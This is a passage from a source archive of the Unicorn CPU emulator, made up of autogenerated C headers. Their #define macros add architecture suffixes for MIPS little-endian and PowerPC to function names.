#define helper_msa_mulr_q_df helper_msa_mulr_q_df_mipsel #define helper_msa_sld_df helper_msa_sld_df_mipsel #define helper_msa_maddv_df helper_msa_maddv_df_mipsel #define helper_msa_msubv_df helper_msa_msubv_df_mipsel #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mipsel #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mipsel #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mipsel #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mipsel #define helper_msa_binsl_df helper_msa_binsl_df_mipsel #define helper_msa_binsr_df helper_msa_binsr_df_mipsel #define helper_msa_madd_q_df helper_msa_madd_q_df_mipsel #define helper_msa_msub_q_df helper_msa_msub_q_df_mipsel #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mipsel #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mipsel #define helper_msa_splat_df helper_msa_splat_df_mipsel #define helper_msa_vshf_df helper_msa_vshf_df_mipsel #define helper_msa_sldi_df helper_msa_sldi_df_mipsel #define helper_msa_splati_df helper_msa_splati_df_mipsel #define helper_msa_copy_s_b helper_msa_copy_s_b_mipsel #define helper_msa_copy_s_h helper_msa_copy_s_h_mipsel #define helper_msa_copy_s_w helper_msa_copy_s_w_mipsel #define helper_msa_copy_s_d helper_msa_copy_s_d_mipsel #define helper_msa_copy_u_b helper_msa_copy_u_b_mipsel #define helper_msa_copy_u_h helper_msa_copy_u_h_mipsel #define helper_msa_copy_u_w helper_msa_copy_u_w_mipsel #define helper_msa_insert_b helper_msa_insert_b_mipsel #define helper_msa_insert_h helper_msa_insert_h_mipsel #define helper_msa_insert_w helper_msa_insert_w_mipsel #define helper_msa_insert_d helper_msa_insert_d_mipsel #define helper_msa_insve_df helper_msa_insve_df_mipsel #define helper_msa_ctcmsa helper_msa_ctcmsa_mipsel #define helper_msa_cfcmsa helper_msa_cfcmsa_mipsel #define helper_msa_fill_df helper_msa_fill_df_mipsel #define helper_msa_fcaf_df helper_msa_fcaf_df_mipsel #define helper_msa_fcun_df helper_msa_fcun_df_mipsel #define helper_msa_fceq_df helper_msa_fceq_df_mipsel #define helper_msa_fcueq_df helper_msa_fcueq_df_mipsel #define helper_msa_fclt_df helper_msa_fclt_df_mipsel #define helper_msa_fcult_df helper_msa_fcult_df_mipsel #define helper_msa_fcle_df helper_msa_fcle_df_mipsel #define helper_msa_fcule_df helper_msa_fcule_df_mipsel #define helper_msa_fsaf_df helper_msa_fsaf_df_mipsel #define helper_msa_fsun_df helper_msa_fsun_df_mipsel #define helper_msa_fseq_df helper_msa_fseq_df_mipsel #define helper_msa_fsueq_df helper_msa_fsueq_df_mipsel #define helper_msa_fslt_df helper_msa_fslt_df_mipsel #define helper_msa_fsult_df helper_msa_fsult_df_mipsel #define helper_msa_fsle_df helper_msa_fsle_df_mipsel #define helper_msa_fsule_df helper_msa_fsule_df_mipsel #define helper_msa_fcor_df helper_msa_fcor_df_mipsel #define helper_msa_fcune_df helper_msa_fcune_df_mipsel #define helper_msa_fcne_df helper_msa_fcne_df_mipsel #define helper_msa_fsor_df helper_msa_fsor_df_mipsel #define helper_msa_fsune_df helper_msa_fsune_df_mipsel #define helper_msa_fsne_df helper_msa_fsne_df_mipsel #define helper_msa_fadd_df helper_msa_fadd_df_mipsel #define helper_msa_fsub_df helper_msa_fsub_df_mipsel #define helper_msa_fmul_df helper_msa_fmul_df_mipsel #define helper_msa_fdiv_df helper_msa_fdiv_df_mipsel #define helper_msa_fmadd_df helper_msa_fmadd_df_mipsel #define helper_msa_fmsub_df helper_msa_fmsub_df_mipsel #define helper_msa_fexp2_df helper_msa_fexp2_df_mipsel #define helper_msa_fexdo_df helper_msa_fexdo_df_mipsel #define helper_msa_ftq_df helper_msa_ftq_df_mipsel #define helper_msa_fmin_df helper_msa_fmin_df_mipsel #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mipsel #define helper_msa_fmax_df helper_msa_fmax_df_mipsel #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mipsel #define helper_msa_fclass_df helper_msa_fclass_df_mipsel #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mipsel #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mipsel #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mipsel #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mipsel #define helper_msa_frcp_df helper_msa_frcp_df_mipsel #define helper_msa_frint_df helper_msa_frint_df_mipsel #define helper_msa_flog2_df helper_msa_flog2_df_mipsel #define helper_msa_fexupl_df helper_msa_fexupl_df_mipsel #define helper_msa_fexupr_df helper_msa_fexupr_df_mipsel #define helper_msa_ffql_df helper_msa_ffql_df_mipsel #define helper_msa_ffqr_df helper_msa_ffqr_df_mipsel #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mipsel #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mipsel #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mipsel #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mipsel #define helper_raise_exception_err helper_raise_exception_err_mipsel #define helper_raise_exception helper_raise_exception_mipsel #define helper_raise_exception_debug helper_raise_exception_debug_mipsel #define helper_muls helper_muls_mipsel #define helper_mulsu helper_mulsu_mipsel #define helper_macc helper_macc_mipsel #define helper_macchi helper_macchi_mipsel #define helper_maccu helper_maccu_mipsel #define helper_macchiu helper_macchiu_mipsel #define helper_msac helper_msac_mipsel #define helper_msachi helper_msachi_mipsel #define helper_msacu helper_msacu_mipsel #define helper_msachiu helper_msachiu_mipsel #define helper_mulhi helper_mulhi_mipsel #define helper_mulhiu helper_mulhiu_mipsel #define helper_mulshi helper_mulshi_mipsel #define helper_mulshiu helper_mulshiu_mipsel #define helper_dbitswap helper_dbitswap_mipsel #define helper_bitswap helper_bitswap_mipsel #define helper_rotx helper_rotx_mipsel #define helper_ll helper_ll_mipsel #define helper_lld helper_lld_mipsel #define helper_swl helper_swl_mipsel #define helper_swr helper_swr_mipsel #define helper_sdl helper_sdl_mipsel #define helper_sdr helper_sdr_mipsel #define helper_lwm helper_lwm_mipsel #define helper_swm helper_swm_mipsel #define helper_ldm helper_ldm_mipsel #define helper_sdm helper_sdm_mipsel #define helper_fork helper_fork_mipsel #define helper_yield helper_yield_mipsel #define r4k_helper_tlbinv r4k_helper_tlbinv_mipsel #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mipsel #define r4k_helper_tlbwi r4k_helper_tlbwi_mipsel #define r4k_helper_tlbwr r4k_helper_tlbwr_mipsel #define r4k_helper_tlbp r4k_helper_tlbp_mipsel #define r4k_helper_tlbr r4k_helper_tlbr_mipsel #define helper_tlbwi helper_tlbwi_mipsel #define helper_tlbwr helper_tlbwr_mipsel #define helper_tlbp helper_tlbp_mipsel #define helper_tlbr helper_tlbr_mipsel #define helper_tlbinv helper_tlbinv_mipsel #define helper_tlbinvf helper_tlbinvf_mipsel #define helper_ginvt helper_ginvt_mipsel #define helper_di helper_di_mipsel #define helper_ei helper_ei_mipsel #define helper_eret helper_eret_mipsel #define helper_eretnc helper_eretnc_mipsel #define helper_deret helper_deret_mipsel #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mipsel #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mipsel #define helper_rdhwr_cc helper_rdhwr_cc_mipsel #define helper_rdhwr_ccres helper_rdhwr_ccres_mipsel #define helper_rdhwr_performance helper_rdhwr_performance_mipsel #define helper_rdhwr_xnp helper_rdhwr_xnp_mipsel #define helper_pmon helper_pmon_mipsel #define helper_wait helper_wait_mipsel #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mipsel #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mipsel #define helper_msa_ld_b helper_msa_ld_b_mipsel #define helper_msa_ld_h helper_msa_ld_h_mipsel #define helper_msa_ld_w helper_msa_ld_w_mipsel #define helper_msa_ld_d helper_msa_ld_d_mipsel #define helper_msa_st_b helper_msa_st_b_mipsel #define helper_msa_st_h helper_msa_st_h_mipsel #define helper_msa_st_w helper_msa_st_w_mipsel #define helper_msa_st_d helper_msa_st_d_mipsel #define helper_cache helper_cache_mipsel #define gen_intermediate_code gen_intermediate_code_mipsel #define mips_tcg_init mips_tcg_init_mipsel #define cpu_mips_realize_env cpu_mips_realize_env_mipsel #define cpu_state_reset cpu_state_reset_mipsel #define restore_state_to_opc restore_state_to_opc_mipsel #define ieee_rm ieee_rm_mipsel #define mips_defs mips_defs_mipsel #define mips_defs_number mips_defs_number_mipsel #define gen_helper_float_class_s gen_helper_float_class_s_mipsel #define gen_helper_float_class_d gen_helper_float_class_d_mipsel #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/ppc.h����������������������������������������������������������������������������0000664�0000000�0000000�00000257316�14675241067�0015124�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_ppc_H #define UNICORN_AUTOGEN_ppc_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _ppc #endif #define unicorn_fill_tlb unicorn_fill_tlb_ppc #define reg_read reg_read_ppc #define reg_write reg_write_ppc #define uc_init uc_init_ppc #define uc_add_inline_hook uc_add_inline_hook_ppc #define uc_del_inline_hook uc_del_inline_hook_ppc #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc #define use_idiv_instructions use_idiv_instructions_ppc #define arm_arch arm_arch_ppc #define tb_target_set_jmp_target tb_target_set_jmp_target_ppc #define have_bmi1 have_bmi1_ppc #define have_popcnt have_popcnt_ppc #define have_avx1 have_avx1_ppc #define have_avx2 have_avx2_ppc #define have_isa have_isa_ppc #define have_altivec have_altivec_ppc #define have_vsx have_vsx_ppc #define flush_icache_range flush_icache_range_ppc #define s390_facilities s390_facilities_ppc #define tcg_dump_op tcg_dump_op_ppc #define tcg_dump_ops tcg_dump_ops_ppc #define tcg_gen_and_i64 tcg_gen_and_i64_ppc #define tcg_gen_discard_i64 tcg_gen_discard_i64_ppc #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_ppc #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_ppc #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_ppc #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_ppc #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_ppc #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_ppc #define tcg_gen_ld_i64 tcg_gen_ld_i64_ppc #define tcg_gen_mov_i64 tcg_gen_mov_i64_ppc #define tcg_gen_movi_i64 tcg_gen_movi_i64_ppc #define tcg_gen_mul_i64 tcg_gen_mul_i64_ppc #define tcg_gen_or_i64 tcg_gen_or_i64_ppc #define tcg_gen_sar_i64 tcg_gen_sar_i64_ppc #define tcg_gen_shl_i64 tcg_gen_shl_i64_ppc #define tcg_gen_shr_i64 tcg_gen_shr_i64_ppc #define tcg_gen_st_i64 tcg_gen_st_i64_ppc #define tcg_gen_xor_i64 tcg_gen_xor_i64_ppc #define cpu_icount_to_ns cpu_icount_to_ns_ppc #define cpu_is_stopped cpu_is_stopped_ppc #define cpu_get_ticks cpu_get_ticks_ppc #define cpu_get_clock cpu_get_clock_ppc #define cpu_resume cpu_resume_ppc #define qemu_init_vcpu qemu_init_vcpu_ppc #define cpu_stop_current cpu_stop_current_ppc #define resume_all_vcpus resume_all_vcpus_ppc #define vm_start vm_start_ppc #define address_space_dispatch_compact address_space_dispatch_compact_ppc #define flatview_translate flatview_translate_ppc #define address_space_translate_for_iotlb address_space_translate_for_iotlb_ppc #define qemu_get_cpu qemu_get_cpu_ppc #define cpu_address_space_init cpu_address_space_init_ppc #define cpu_get_address_space cpu_get_address_space_ppc #define cpu_exec_unrealizefn cpu_exec_unrealizefn_ppc #define cpu_exec_initfn cpu_exec_initfn_ppc #define cpu_exec_realizefn cpu_exec_realizefn_ppc #define tb_invalidate_phys_addr tb_invalidate_phys_addr_ppc #define cpu_watchpoint_insert cpu_watchpoint_insert_ppc #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_ppc #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_ppc #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_ppc #define cpu_breakpoint_insert cpu_breakpoint_insert_ppc #define cpu_breakpoint_remove cpu_breakpoint_remove_ppc #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_ppc #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_ppc #define cpu_abort cpu_abort_ppc #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_ppc #define memory_region_section_get_iotlb memory_region_section_get_iotlb_ppc #define flatview_add_to_dispatch flatview_add_to_dispatch_ppc #define qemu_ram_get_host_addr qemu_ram_get_host_addr_ppc #define qemu_ram_get_offset qemu_ram_get_offset_ppc #define qemu_ram_get_used_length qemu_ram_get_used_length_ppc #define qemu_ram_is_shared qemu_ram_is_shared_ppc #define qemu_ram_pagesize qemu_ram_pagesize_ppc #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_ppc #define qemu_ram_alloc qemu_ram_alloc_ppc #define qemu_ram_free qemu_ram_free_ppc #define qemu_map_ram_ptr qemu_map_ram_ptr_ppc #define qemu_ram_block_host_offset qemu_ram_block_host_offset_ppc #define qemu_ram_block_from_host qemu_ram_block_from_host_ppc #define qemu_ram_addr_from_host qemu_ram_addr_from_host_ppc #define cpu_check_watchpoint cpu_check_watchpoint_ppc #define iotlb_to_section iotlb_to_section_ppc #define address_space_dispatch_new address_space_dispatch_new_ppc #define address_space_dispatch_free address_space_dispatch_free_ppc #define flatview_read_continue flatview_read_continue_ppc #define address_space_read_full address_space_read_full_ppc #define address_space_write address_space_write_ppc #define address_space_rw address_space_rw_ppc #define cpu_physical_memory_rw cpu_physical_memory_rw_ppc #define address_space_write_rom address_space_write_rom_ppc #define cpu_flush_icache_range cpu_flush_icache_range_ppc #define cpu_exec_init_all cpu_exec_init_all_ppc #define address_space_access_valid address_space_access_valid_ppc #define address_space_map address_space_map_ppc #define address_space_unmap address_space_unmap_ppc #define cpu_physical_memory_map cpu_physical_memory_map_ppc #define cpu_physical_memory_unmap cpu_physical_memory_unmap_ppc #define cpu_memory_rw_debug cpu_memory_rw_debug_ppc #define qemu_target_page_size qemu_target_page_size_ppc #define qemu_target_page_bits qemu_target_page_bits_ppc #define qemu_target_page_bits_min qemu_target_page_bits_min_ppc #define target_words_bigendian target_words_bigendian_ppc #define cpu_physical_memory_is_io cpu_physical_memory_is_io_ppc #define ram_block_discard_range ram_block_discard_range_ppc #define ramblock_is_pmem ramblock_is_pmem_ppc #define page_size_init page_size_init_ppc #define set_preferred_target_page_bits set_preferred_target_page_bits_ppc #define finalize_target_page_bits finalize_target_page_bits_ppc #define cpu_outb cpu_outb_ppc #define cpu_outw cpu_outw_ppc #define cpu_outl cpu_outl_ppc #define cpu_inb cpu_inb_ppc #define cpu_inw cpu_inw_ppc #define cpu_inl cpu_inl_ppc #define memory_map memory_map_ppc #define memory_map_io memory_map_io_ppc #define memory_map_ptr memory_map_ptr_ppc #define memory_cow memory_cow_ppc #define memory_unmap memory_unmap_ppc #define memory_moveout memory_moveout_ppc #define memory_movein memory_movein_ppc #define memory_free memory_free_ppc #define flatview_unref flatview_unref_ppc #define address_space_get_flatview address_space_get_flatview_ppc #define memory_region_transaction_begin memory_region_transaction_begin_ppc #define memory_region_transaction_commit memory_region_transaction_commit_ppc #define memory_region_init memory_region_init_ppc #define memory_region_access_valid memory_region_access_valid_ppc #define memory_region_dispatch_read memory_region_dispatch_read_ppc #define memory_region_dispatch_write memory_region_dispatch_write_ppc #define memory_region_init_io memory_region_init_io_ppc #define memory_region_init_ram_ptr memory_region_init_ram_ptr_ppc #define memory_region_size memory_region_size_ppc #define memory_region_set_readonly memory_region_set_readonly_ppc #define memory_region_get_ram_ptr memory_region_get_ram_ptr_ppc #define memory_region_from_host memory_region_from_host_ppc #define memory_region_get_ram_addr memory_region_get_ram_addr_ppc #define memory_region_add_subregion memory_region_add_subregion_ppc #define memory_region_del_subregion memory_region_del_subregion_ppc #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_ppc #define memory_region_find memory_region_find_ppc #define memory_region_filter_subregions memory_region_filter_subregions_ppc #define memory_listener_register memory_listener_register_ppc #define memory_listener_unregister memory_listener_unregister_ppc #define address_space_remove_listeners address_space_remove_listeners_ppc #define address_space_init address_space_init_ppc #define address_space_destroy address_space_destroy_ppc #define memory_region_init_ram memory_region_init_ram_ppc #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_ppc #define find_memory_mapping find_memory_mapping_ppc #define exec_inline_op exec_inline_op_ppc #define floatx80_default_nan floatx80_default_nan_ppc #define float_raise float_raise_ppc #define float16_is_quiet_nan float16_is_quiet_nan_ppc #define float16_is_signaling_nan float16_is_signaling_nan_ppc #define float32_is_quiet_nan float32_is_quiet_nan_ppc #define float32_is_signaling_nan float32_is_signaling_nan_ppc #define float64_is_quiet_nan float64_is_quiet_nan_ppc #define float64_is_signaling_nan float64_is_signaling_nan_ppc #define floatx80_is_quiet_nan floatx80_is_quiet_nan_ppc #define floatx80_is_signaling_nan floatx80_is_signaling_nan_ppc #define floatx80_silence_nan floatx80_silence_nan_ppc #define propagateFloatx80NaN propagateFloatx80NaN_ppc #define float128_is_quiet_nan float128_is_quiet_nan_ppc #define float128_is_signaling_nan float128_is_signaling_nan_ppc #define float128_silence_nan float128_silence_nan_ppc #define float16_add float16_add_ppc #define float16_sub float16_sub_ppc #define float32_add float32_add_ppc #define float32_sub float32_sub_ppc #define float64_add float64_add_ppc #define float64_sub float64_sub_ppc #define float16_mul float16_mul_ppc #define float32_mul float32_mul_ppc #define float64_mul float64_mul_ppc #define float16_muladd float16_muladd_ppc #define float32_muladd float32_muladd_ppc #define float64_muladd float64_muladd_ppc #define float16_div float16_div_ppc #define float32_div float32_div_ppc #define float64_div float64_div_ppc #define float16_to_float32 float16_to_float32_ppc #define float16_to_float64 float16_to_float64_ppc #define float32_to_float16 float32_to_float16_ppc #define float32_to_float64 float32_to_float64_ppc #define float64_to_float16 float64_to_float16_ppc #define float64_to_float32 float64_to_float32_ppc #define float16_round_to_int float16_round_to_int_ppc #define float32_round_to_int float32_round_to_int_ppc #define float64_round_to_int float64_round_to_int_ppc #define float16_to_int16_scalbn float16_to_int16_scalbn_ppc #define float16_to_int32_scalbn float16_to_int32_scalbn_ppc #define float16_to_int64_scalbn float16_to_int64_scalbn_ppc #define float32_to_int16_scalbn float32_to_int16_scalbn_ppc #define float32_to_int32_scalbn float32_to_int32_scalbn_ppc #define float32_to_int64_scalbn float32_to_int64_scalbn_ppc #define float64_to_int16_scalbn float64_to_int16_scalbn_ppc #define float64_to_int32_scalbn float64_to_int32_scalbn_ppc #define float64_to_int64_scalbn float64_to_int64_scalbn_ppc #define float16_to_int16 float16_to_int16_ppc #define float16_to_int32 float16_to_int32_ppc #define float16_to_int64 float16_to_int64_ppc #define float32_to_int16 float32_to_int16_ppc #define float32_to_int32 float32_to_int32_ppc #define float32_to_int64 float32_to_int64_ppc #define float64_to_int16 float64_to_int16_ppc #define float64_to_int32 float64_to_int32_ppc #define float64_to_int64 float64_to_int64_ppc #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_ppc #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_ppc #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_ppc #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_ppc #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_ppc #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_ppc #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_ppc #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_ppc #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_ppc #define float16_to_uint16_scalbn float16_to_uint16_scalbn_ppc #define float16_to_uint32_scalbn float16_to_uint32_scalbn_ppc #define float16_to_uint64_scalbn float16_to_uint64_scalbn_ppc #define float32_to_uint16_scalbn float32_to_uint16_scalbn_ppc #define float32_to_uint32_scalbn float32_to_uint32_scalbn_ppc #define float32_to_uint64_scalbn float32_to_uint64_scalbn_ppc #define float64_to_uint16_scalbn float64_to_uint16_scalbn_ppc #define float64_to_uint32_scalbn float64_to_uint32_scalbn_ppc #define float64_to_uint64_scalbn float64_to_uint64_scalbn_ppc #define float16_to_uint16 float16_to_uint16_ppc #define float16_to_uint32 float16_to_uint32_ppc #define float16_to_uint64 float16_to_uint64_ppc #define float32_to_uint16 float32_to_uint16_ppc #define float32_to_uint32 float32_to_uint32_ppc #define float32_to_uint64 float32_to_uint64_ppc #define float64_to_uint16 float64_to_uint16_ppc #define float64_to_uint32 float64_to_uint32_ppc #define float64_to_uint64 float64_to_uint64_ppc #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_ppc #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_ppc #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_ppc #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_ppc #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_ppc #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_ppc #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_ppc #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_ppc #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_ppc #define int64_to_float16_scalbn int64_to_float16_scalbn_ppc #define int32_to_float16_scalbn int32_to_float16_scalbn_ppc #define int16_to_float16_scalbn int16_to_float16_scalbn_ppc #define int64_to_float16 int64_to_float16_ppc #define int32_to_float16 int32_to_float16_ppc #define int16_to_float16 int16_to_float16_ppc #define int64_to_float32_scalbn int64_to_float32_scalbn_ppc #define int32_to_float32_scalbn int32_to_float32_scalbn_ppc #define int16_to_float32_scalbn int16_to_float32_scalbn_ppc #define int64_to_float32 int64_to_float32_ppc #define int32_to_float32 int32_to_float32_ppc #define int16_to_float32 int16_to_float32_ppc #define int64_to_float64_scalbn int64_to_float64_scalbn_ppc #define int32_to_float64_scalbn int32_to_float64_scalbn_ppc #define int16_to_float64_scalbn int16_to_float64_scalbn_ppc #define int64_to_float64 int64_to_float64_ppc #define int32_to_float64 int32_to_float64_ppc #define int16_to_float64 int16_to_float64_ppc #define uint64_to_float16_scalbn uint64_to_float16_scalbn_ppc #define uint32_to_float16_scalbn uint32_to_float16_scalbn_ppc #define uint16_to_float16_scalbn uint16_to_float16_scalbn_ppc #define uint64_to_float16 uint64_to_float16_ppc #define uint32_to_float16 uint32_to_float16_ppc #define uint16_to_float16 uint16_to_float16_ppc #define uint64_to_float32_scalbn uint64_to_float32_scalbn_ppc #define uint32_to_float32_scalbn uint32_to_float32_scalbn_ppc #define uint16_to_float32_scalbn uint16_to_float32_scalbn_ppc #define uint64_to_float32 uint64_to_float32_ppc #define uint32_to_float32 uint32_to_float32_ppc #define uint16_to_float32 uint16_to_float32_ppc #define uint64_to_float64_scalbn uint64_to_float64_scalbn_ppc #define uint32_to_float64_scalbn uint32_to_float64_scalbn_ppc #define uint16_to_float64_scalbn uint16_to_float64_scalbn_ppc #define uint64_to_float64 uint64_to_float64_ppc #define uint32_to_float64 uint32_to_float64_ppc #define uint16_to_float64 uint16_to_float64_ppc #define float16_min float16_min_ppc #define float16_minnum float16_minnum_ppc #define float16_minnummag float16_minnummag_ppc #define float16_max float16_max_ppc #define float16_maxnum float16_maxnum_ppc #define float16_maxnummag float16_maxnummag_ppc #define float32_min float32_min_ppc #define float32_minnum float32_minnum_ppc #define float32_minnummag float32_minnummag_ppc #define float32_max float32_max_ppc #define float32_maxnum float32_maxnum_ppc #define float32_maxnummag float32_maxnummag_ppc #define float64_min float64_min_ppc #define float64_minnum float64_minnum_ppc #define float64_minnummag float64_minnummag_ppc #define float64_max float64_max_ppc #define float64_maxnum float64_maxnum_ppc #define float64_maxnummag float64_maxnummag_ppc #define float16_compare float16_compare_ppc #define float16_compare_quiet float16_compare_quiet_ppc #define float32_compare float32_compare_ppc #define float32_compare_quiet float32_compare_quiet_ppc #define float64_compare float64_compare_ppc #define float64_compare_quiet float64_compare_quiet_ppc #define float16_scalbn float16_scalbn_ppc #define float32_scalbn float32_scalbn_ppc #define float64_scalbn float64_scalbn_ppc #define float16_sqrt float16_sqrt_ppc #define float32_sqrt float32_sqrt_ppc #define float64_sqrt float64_sqrt_ppc #define float16_default_nan float16_default_nan_ppc #define float32_default_nan float32_default_nan_ppc #define float64_default_nan float64_default_nan_ppc #define float128_default_nan float128_default_nan_ppc #define float16_silence_nan float16_silence_nan_ppc #define float32_silence_nan float32_silence_nan_ppc #define float64_silence_nan float64_silence_nan_ppc #define float16_squash_input_denormal float16_squash_input_denormal_ppc #define float32_squash_input_denormal float32_squash_input_denormal_ppc #define float64_squash_input_denormal float64_squash_input_denormal_ppc #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_ppc #define roundAndPackFloatx80 roundAndPackFloatx80_ppc #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_ppc #define int32_to_floatx80 int32_to_floatx80_ppc #define int32_to_float128 int32_to_float128_ppc #define int64_to_floatx80 int64_to_floatx80_ppc #define int64_to_float128 int64_to_float128_ppc #define uint64_to_float128 uint64_to_float128_ppc #define float32_to_floatx80 float32_to_floatx80_ppc #define float32_to_float128 float32_to_float128_ppc #define float32_rem float32_rem_ppc #define float32_exp2 float32_exp2_ppc #define float32_log2 float32_log2_ppc #define float32_eq float32_eq_ppc #define float32_le float32_le_ppc #define float32_lt float32_lt_ppc #define float32_unordered float32_unordered_ppc #define float32_eq_quiet float32_eq_quiet_ppc #define float32_le_quiet float32_le_quiet_ppc #define float32_lt_quiet float32_lt_quiet_ppc #define float32_unordered_quiet float32_unordered_quiet_ppc #define float64_to_floatx80 float64_to_floatx80_ppc #define float64_to_float128 float64_to_float128_ppc #define float64_rem float64_rem_ppc #define float64_log2 float64_log2_ppc #define float64_eq float64_eq_ppc #define float64_le float64_le_ppc #define float64_lt float64_lt_ppc #define float64_unordered float64_unordered_ppc #define float64_eq_quiet float64_eq_quiet_ppc #define float64_le_quiet float64_le_quiet_ppc #define float64_lt_quiet float64_lt_quiet_ppc #define float64_unordered_quiet float64_unordered_quiet_ppc #define floatx80_to_int32 floatx80_to_int32_ppc #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_ppc #define floatx80_to_int64 floatx80_to_int64_ppc #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_ppc #define floatx80_to_float32 floatx80_to_float32_ppc #define floatx80_to_float64 floatx80_to_float64_ppc #define floatx80_to_float128 floatx80_to_float128_ppc #define floatx80_round floatx80_round_ppc #define floatx80_round_to_int floatx80_round_to_int_ppc #define floatx80_add floatx80_add_ppc #define floatx80_sub floatx80_sub_ppc #define floatx80_mul floatx80_mul_ppc #define floatx80_div floatx80_div_ppc #define floatx80_rem floatx80_rem_ppc #define floatx80_sqrt floatx80_sqrt_ppc #define floatx80_eq floatx80_eq_ppc #define floatx80_le floatx80_le_ppc #define floatx80_lt floatx80_lt_ppc #define floatx80_unordered floatx80_unordered_ppc #define floatx80_eq_quiet floatx80_eq_quiet_ppc #define floatx80_le_quiet floatx80_le_quiet_ppc #define floatx80_lt_quiet floatx80_lt_quiet_ppc #define floatx80_unordered_quiet floatx80_unordered_quiet_ppc #define float128_to_int32 float128_to_int32_ppc #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_ppc #define float128_to_int64 float128_to_int64_ppc #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_ppc #define float128_to_uint64 float128_to_uint64_ppc #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_ppc #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_ppc #define float128_to_uint32 float128_to_uint32_ppc #define float128_to_float32 float128_to_float32_ppc #define float128_to_float64 float128_to_float64_ppc #define float128_to_floatx80 float128_to_floatx80_ppc #define float128_round_to_int float128_round_to_int_ppc #define float128_add float128_add_ppc #define float128_sub float128_sub_ppc #define float128_mul float128_mul_ppc #define float128_div float128_div_ppc #define float128_rem float128_rem_ppc #define float128_sqrt float128_sqrt_ppc #define float128_eq float128_eq_ppc #define float128_le float128_le_ppc #define float128_lt float128_lt_ppc #define float128_unordered float128_unordered_ppc #define float128_eq_quiet float128_eq_quiet_ppc #define float128_le_quiet float128_le_quiet_ppc #define float128_lt_quiet float128_lt_quiet_ppc #define float128_unordered_quiet float128_unordered_quiet_ppc #define floatx80_compare floatx80_compare_ppc #define floatx80_compare_quiet floatx80_compare_quiet_ppc #define float128_compare float128_compare_ppc #define float128_compare_quiet float128_compare_quiet_ppc #define floatx80_scalbn floatx80_scalbn_ppc #define float128_scalbn float128_scalbn_ppc #define softfloat_init softfloat_init_ppc #define tcg_optimize tcg_optimize_ppc #define gen_new_label gen_new_label_ppc #define tcg_can_emit_vec_op tcg_can_emit_vec_op_ppc #define tcg_expand_vec_op tcg_expand_vec_op_ppc #define tcg_register_jit tcg_register_jit_ppc #define tcg_tb_insert tcg_tb_insert_ppc #define tcg_tb_remove tcg_tb_remove_ppc #define tcg_tb_lookup tcg_tb_lookup_ppc #define tcg_tb_foreach tcg_tb_foreach_ppc #define tcg_nb_tbs tcg_nb_tbs_ppc #define tcg_region_reset_all 